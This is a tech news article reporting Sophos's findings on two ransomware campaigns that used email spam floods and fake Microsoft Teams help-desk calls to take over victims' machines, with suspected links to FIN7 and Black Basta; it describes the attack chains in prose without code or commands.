Ransomware scum make it personal for Reg readers by impersonating tech support

Two ransomware campaigns are abusing Microsoft Teams to infect organizations and steal data, and the crooks may have ties to Black Basta and FIN7, according to Sophos.

The antivirus maker’s managed detection and response (MDR) team began investigating the two separate campaigns in November and December. Both of the ransomware crews, which Sophos calls STAC5143 and STAC5777, operated their own Microsoft Office 365 service tenants for these attacks and also abused a default Teams configuration that allows external users to initiate meetings or chats with internal ones.

STAC5777, we’re told, overlaps with a group Microsoft tracks as Storm-1811 that was previously spotted abusing Microsoft’s Quick Assist application to deploy Black Basta ransomware.

The second group, STAC5143, may have ties to Russia’s FIN7, also called Sangria Tempest or Carbon Spider.

However, while some of the malware used in the two recent STAC5143 attacks was similar to that used by FIN7, “this attack chain was different, and targeted organizations smaller and in different business sectors than FIN7’s usual victims,” Sophos threat hunters Mark Parsons, Colin Cowie, Daniel Souter, Hunter Neal, Anthony Bradshaw, and Sean Gallagher said in a Tuesday report.

From email spam to device takeover

STAC5143 first appeared on the Sophos team’s radar in November, when a customer reported receiving more than 3,000 spam emails in a 45-minute period. 

Soon after, the customer received a Microsoft Teams call from outside the org, coming from a bogus “Help Desk Manager” account. During the call, the phony help desk instructed the employee to allow a remote screen control session through Teams. The attacker then used this access to open a command shell, drop some files, and run malware on the victim’s machine.

More specifically, one of the files dropped was a .jar archive of Java code, run with no console output by the legit javaw.exe program, which in turn executed PowerShell commands and download a 7zip archive and the 7zip archiving utility; the unzipped archive contained a ProtonVPN executable and a malicious DLL (nethost.dll) side-loaded by the Proton executable.

After launching the ProtonVPN executable to side-load nethost.dll, the attackers connected to virtual private servers hosted in Russia, the Netherlands, and the US, which ultimately triggered Sophos’s endpoint protection tools (the use of a suspiciously unsigned DLL, we’re told).

The Java code also did some reconnaissance work, mainly scoping out the user’s account name and local network, and ultimately extracted and ran from a dropped winter.zip archive a payload that contained a Python-based backdoor to remote control the Windows computer. The Python code included a lambda function to obfuscate the malware, which matched previously spotted FIN7-related Python malware loaders. 

Two other pieces of Python code extracted by the malware included copies of a publicly available reverse SOCKS proxy called RPivot, which FIN7 has also used in its earlier attacks.

“Sophos assesses with medium confidence that the Python malware used in this attack is connected to the threat actors behind FIN7/Sangria Tempest,” the incident responders noted.

STAC5777 spotted deploying Black Basta ransomware

Similarly, the STAC5777 attacks began with massive amounts of spam emails sent to targeted orgs followed by Teams messages claiming to be from the internal IT team. These messages requested a Teams call to stop the spam.

“But unlike the STAC5143 incidents we’ve observed, STAC5777 activity relied much more on ‘hands-on-keyboard’ actions and scripted commands launched by the threat actors directly than STAC5143,” the Sophos team said.

In each of these instances, the attackers guided the victim through installing and executing Microsoft’s Quick Assist remote access tool, which then gave them control of the victim’s device. 

After taking control of the Windows machine, the miscreants downloaded a payload containing, among other things, a malicious DLL, winhttp.dll, that collected the user’s system, OS, and configuration details, and stored credentials; plus keystrokes.

The attackers also downloaded unsigned .DLLs derived from an OpenSSL toolkit, which were then used by the legit Windows OneDriveStandaloneUpdater.exe process to inadvertently establish encrypted command-and-control (C2) connections to remote hosts, including a virtual private server linked to infrastructure favored by Russia-based criminals.

After establishing the C2 communications, the OneDriveStandaloneUpdater.exe process was made to scan for Remote Desktop Protocol and Windows Remote Management (WinRM) hosts that could be accessed using the victims’ stolen credentials.

The attackers then attempted to move laterally to other hosts. In one case, they used the backdoor to uninstall local multifactor authentication integration on the compromised device. 

Sophos also observed the crims hoovering up local files that contained “password” in the name of the document. Plus, in one case – which Sophos assures was blocked by its security protections – STAC5777 attempted to infect the machine with the Black Basta ransomware. ®

READ MORE HERE